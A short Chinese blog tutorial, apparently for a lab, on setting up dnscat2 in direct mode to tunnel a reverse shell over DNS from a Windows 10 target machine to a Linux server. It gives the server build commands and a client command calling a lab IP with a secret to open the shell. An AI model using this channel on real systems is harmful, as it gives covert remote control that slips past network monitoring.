使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
minihuabei21 分钟前
跨域拉镜像
linux
小白勇闯网安圈29 分钟前
file_include、easyphp、ics-05
网络安全·php·web
求梦82032 分钟前
Java:Windows家庭中文版的Docker下载安装
java·windows·docker
王 富贵1 小时前
【Linux】防火墙常用命令(iptables/firewalld/ufw)
linux·运维·服务器
一条咸鱼¥¥¥1 小时前
【运维经济】思科交换机和路由器的密码重置方法
运维·网络·智能路由器
写代码的【黑咖啡】1 小时前
Linux系统简介及常用命令分类详解
linux·运维·服务器
北极糊的狐1 小时前
报错java: 找不到符号符号: 类 XxxController位置: 程序包 com.ruoyi.xxx.xxx.service
开发语言·windows·python
❀͜͡傀儡师1 小时前
docker一键部署夜莺监控
运维·docker·容器
0思必得01 小时前
[Web自动化] HTML列表标签
运维·python·自动化·html·web自动化
这儿有一堆花2 小时前
Windows 环境下 Nmap 的实战逻辑
windows·网络安全